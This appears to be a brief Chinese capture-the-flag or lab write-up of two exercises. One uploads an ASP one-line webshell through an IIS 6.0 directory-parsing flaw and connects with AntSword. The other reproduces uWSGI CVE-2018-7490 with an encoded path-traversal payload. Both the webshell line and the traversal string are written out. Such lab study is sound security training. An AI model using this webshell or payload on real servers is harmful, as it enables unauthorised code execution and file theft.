一、内部文件上传系统漏洞分析溯源
过程
1.访问靶场

2.准备asp一句话木马
<%eval request("MH")%>

3.上传asp.txt,抓包,修改参数

4.放包,蚁剑连接




原理
IIS6.0目录解析:
以*.asp命名的文件夹下,里面的文件都将会被当成ASP文件执行
二、uWSGI 漏洞复现(CVE-2018-7490)
过程
1.访问靶场

2.poc
/..%2F..%2F..%2F..%2F..%2Fkey.txt

原理
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT